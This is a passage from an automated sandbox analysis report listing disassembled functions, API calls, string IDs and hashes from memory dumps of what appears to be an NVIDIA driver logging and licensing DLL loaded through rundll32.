                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Exception$DeallocateFileHeaderRaiseThrow__std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                    • String ID: ClassName$DebugOutputLogManager$FileLogManager$No LogManager defined with such name$StreamManager
                                                                    • API String ID: 2903377776-1756275191
                                                                    • Opcode ID: c4426073df8bf17878242d3d365278b24583b98ba0d4c22a861248d6dc48f0be
                                                                    • Instruction ID: 15dee3f6fc32f60beb63091e8f36144e925e44ff472de8af4a48ee76ab4ecfbe
                                                                    • Opcode Fuzzy Hash: c4426073df8bf17878242d3d365278b24583b98ba0d4c22a861248d6dc48f0be
                                                                    • Instruction Fuzzy Hash: 72414C32A0AA02F8EB10EB61D8512F83365EF447D8F815131DA2D476A5EF3DE568C368
                                                                    Function 00007FF8A8DBC460 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$DeleteDirectoryFileInit_thread_footerRemove
                                                                    • String ID: boost::filesystem::remove
                                                                    • API String ID: 755209694-3435932043
                                                                    • Opcode ID: b64bcb777294a3ce97eee687f9109f358c09142d434cbb4407fc3cf7f26453ea
                                                                    • Instruction ID: 2721991c0055cc7e54ffcaa0dc22feb4712fd2a1ba28f029afaa7fbd2b5cc719
                                                                    • Opcode Fuzzy Hash: b64bcb777294a3ce97eee687f9109f358c09142d434cbb4407fc3cf7f26453ea
                                                                    • Instruction Fuzzy Hash: 01318361A1A182A9FF640B69944C2B92391FF15BD4F640032C92CC3691EF3CFA9C827C
                                                                    Function 00007FF8A8D07CB4 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Ios_base_dtorstd::invalid_argument::invalid_argumentstd::ios_base::_
                                                                    • String ID: Nvidia::Logging::Logger::Logger$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\Logger.h$could not convert calendar time to local time$system
                                                                    • API String ID: 3568783628-2048051025
                                                                    • Opcode ID: 5b125194a3b6fbd640f5732ddd7af8216da403e2aec9da76d1aaa13bfb246306
                                                                    • Instruction ID: 47434af915c0dd2153128e5c3a8dd823063a2c9e07402a74122ee4bed1edc6ed
                                                                    • Opcode Fuzzy Hash: 5b125194a3b6fbd640f5732ddd7af8216da403e2aec9da76d1aaa13bfb246306
                                                                    • Instruction Fuzzy Hash: B6917A32A1AB82A5EB10DF21E8401ED33B4FB847D8F800136EA5D17B99EF39D559C364
                                                                    Function 00007FF8A8D2FBA0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteValue$EnumerateFreeInit_thread_footerMemorySessionslstrcat
                                                                    • String ID: License to be returned on session logoff: $NvXDCore.cpp$Releasing lease during session logff : $ReturnLicenseOnSessionLogoff
                                                                    • API String ID: 3566551686-1588682423
                                                                    • Opcode ID: 89394ad219414ea1eda7d1833e9640e5cda7d38ad91ebd8383589c79d5e3b979
                                                                    • Instruction ID: 27add6e55bfd1afeb04c61fe14bd152a4529573872c0065a13a9fc9091224784
                                                                    • Opcode Fuzzy Hash: 89394ad219414ea1eda7d1833e9640e5cda7d38ad91ebd8383589c79d5e3b979
                                                                    • Instruction Fuzzy Hash: 31910932B06B42AAE711DF61E4401EC33B5FB44788F405536DA5D27B69EF38E129C358
                                                                    Function 00007FF8A8CFD5C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DeviceErrorLastSetup$InstancePropertyRegistry
                                                                    • String ID: NDERP_DEVID$NDERP_GPU_NAME
                                                                    • API String ID: 4016996502-1684991087
                                                                    • Opcode ID: 5c12baaee5edd9489b6348ea5daa4417e27e7cca9e10c216e82b9e699b45b1b1
                                                                    • Instruction ID: 05d521a357c40c82430e1893a229779b5557b933d9abbbe8af13166535269781
                                                                    • Opcode Fuzzy Hash: 5c12baaee5edd9489b6348ea5daa4417e27e7cca9e10c216e82b9e699b45b1b1
                                                                    • Instruction Fuzzy Hash: 8A41B461A1EA81A1EB10EB66E8442FA6365FF85BD0F844032DF9D43B55DF3CE50AC718
                                                                    Function 00007FF8A8CFC4CC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 94librarymemoryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AddressAllocConditionErrorFreeInfoLastMaskProcVerifyVersion
                                                                    • String ID: Advapi32.dll$RegQueryValueExW
                                                                    • API String ID: 3707099831-295176829
                                                                    • Opcode ID: 3b1918feed5cdcf811039015ee0c203f6dbd9f2afb8276c003aca7cd37809b0a
                                                                    • Instruction ID: 7c0927bf4d93a346a51f7b7f64b7e80a4d55bd7d5a49a95c7cebaeec2e6f5237
                                                                    • Opcode Fuzzy Hash: 3b1918feed5cdcf811039015ee0c203f6dbd9f2afb8276c003aca7cd37809b0a
                                                                    • Instruction Fuzzy Hash: 0B415271B1AB12A2FB948B11A85067972A0FB58BC4F484035EA4D47754EF7CE9218B68
                                                                    Function 00007FF8A8D09438 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D0EA24: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0EA6E
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D09538
                                                                      • Part of subcall function 00007FF8A8D00A80: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00AB2
                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D09548
                                                                      • Part of subcall function 00007FF8A8DC1390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC140D
                                                                      • Part of subcall function 00007FF8A8DC1390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC144C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Exception$DeallocateFileHeaderRaiseThrow__std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                    • String ID: ClassName$No LogPrinter defined with such nume.$SimpleTextLogPrinter$XMLLogPrinter
                                                                    • API String ID: 2903377776-3681829448
                                                                    • Opcode ID: 3047caec9a1ebb199cdd8f96b7ca8cb83d8ba6ed920aecadf12f31988e93eda1
                                                                    • Instruction ID: 7083d4e1eaa17e2706898aa2073aa5bd09e2862bc6dfe49bb2483c2d15918116
                                                                    • Opcode Fuzzy Hash: 3047caec9a1ebb199cdd8f96b7ca8cb83d8ba6ed920aecadf12f31988e93eda1
                                                                    • Instruction Fuzzy Hash: E6317E32A0BA42B8EB10EF61D8912EC2371EF447D8F811531DA2E57696EF3DE518C358
                                                                    Function 00007FF8A8CFE3B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70registrylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                    • API String ID: 823179699-3913318428
                                                                    • Opcode ID: c8e40227ea93570c894c3257a732f5e36d0e2c3d26c8cd2adc3fe59e8dea6017
                                                                    • Instruction ID: 8d6763f5adc0931329c39658ac2746c21f2a1c7ec62f102192fe6f79adf389e2
                                                                    • Opcode Fuzzy Hash: c8e40227ea93570c894c3257a732f5e36d0e2c3d26c8cd2adc3fe59e8dea6017
                                                                    • Instruction Fuzzy Hash: CE318132A0AB4296FB51DF56E81032967A0FB84BC4F084135DE8D0BB54DF7CE951CB18
                                                                    Function 00007FF8A8DB6E08 Relevance: 9.2, APIs: 6, Instructions: 212COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharCompareMultiStringWide__crt$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 3104693799-0
                                                                    • Opcode ID: e554589ce4c0a784027f7e8b14f4731f03de580504056812860894e7a5514fc0
                                                                    • Instruction ID: 2e8d91caec43f8ebf53b4f794e49f1e87092b425819c61201dafa92dbc4564a6
                                                                    • Opcode Fuzzy Hash: e554589ce4c0a784027f7e8b14f4731f03de580504056812860894e7a5514fc0
                                                                    • Instruction Fuzzy Hash: 0581A432B0A7429BEF248F25D444A7962A1FF44BE8F144636EA2D47BC5DF3CE5098724
                                                                    Function 00007FF8A8D75E30 Relevance: 9.1, APIs: 6, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 469901203-0
                                                                    • Opcode ID: d83811cde9e9b156d4a607af37dc42f73d06dcad2c02b179441610010b2369ea
                                                                    • Instruction ID: 74d890327b0131c74142a519ae56f610831430cb97dc7b5bf6e7586b1e7be40f
                                                                    • Opcode Fuzzy Hash: d83811cde9e9b156d4a607af37dc42f73d06dcad2c02b179441610010b2369ea
                                                                    • Instruction Fuzzy Hash: CC51C232A0AB8155E7249B25B80036AA6A1FB457F0F240B34D7BD43BE5CF3CE4958319
                                                                    Function 00007FF8A8D64318 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: dkT$dkT
                                                                    • API String ID: 1323251999-980905629
                                                                    • Opcode ID: 8df98094edd58df8c846224314a2a9f5266a0c90ba580280117205ba055be1a9
                                                                    • Instruction ID: e958898a2fc3c004f24d64b2b70a85dcf148bda1296ade6be5e46dd8238e74bd
                                                                    • Opcode Fuzzy Hash: 8df98094edd58df8c846224314a2a9f5266a0c90ba580280117205ba055be1a9
                                                                    • Instruction Fuzzy Hash: 3CA1DE32B16B4995EB04CF62E4402AC37A5FB48BE8F118636EE6D23B94DF38D419C314
                                                                    Function 00007FF8A8D637C8 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: dkT$dkT
                                                                    • API String ID: 1323251999-980905629
                                                                    • Opcode ID: d27c97df42f0919bb7aabc8d5ab22ae6d130fd941372a0e1de78d82f0e819688
                                                                    • Instruction ID: 63a42f42aa476de44dcade453e4853257fc240940ac71eaf679ab03ae9598113
                                                                    • Opcode Fuzzy Hash: d27c97df42f0919bb7aabc8d5ab22ae6d130fd941372a0e1de78d82f0e819688
                                                                    • Instruction Fuzzy Hash: 0A910D32B16B98A5EB04DF66E4402AC3365FB44BE8F418636EE6D53B98CF38D419C314
                                                                    Function 00007FF8A8DE4C28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157timeCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _get_daylight.LIBCMT ref: 00007FF8A8DE4C4B
                                                                      • Part of subcall function 00007FF8A8DE4504: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DE4518
                                                                    • _get_daylight.LIBCMT ref: 00007FF8A8DE4C5C
                                                                      • Part of subcall function 00007FF8A8DE44A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DE44B8
                                                                    • _get_daylight.LIBCMT ref: 00007FF8A8DE4C6D
                                                                      • Part of subcall function 00007FF8A8DE44D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DE44E8
                                                                      • Part of subcall function 00007FF8A8DDFDD0: HeapFree.KERNEL32(?,?,00000000,00007FF8A8DE0848,?,?,00002F2295E69E2A,00007FF8A8DCD349,?,?,?,?,00007FF8A8DDCE56,?,?,00000000), ref: 00007FF8A8DDFDE6
                                                                      • Part of subcall function 00007FF8A8DDFDD0: GetLastError.KERNEL32(?,?,00000000,00007FF8A8DE0848,?,?,00002F2295E69E2A,00007FF8A8DCD349,?,?,?,?,00007FF8A8DDCE56,?,?,00000000), ref: 00007FF8A8DDFDF8
                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF8A8DE4EA1), ref: 00007FF8A8DE4C94
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
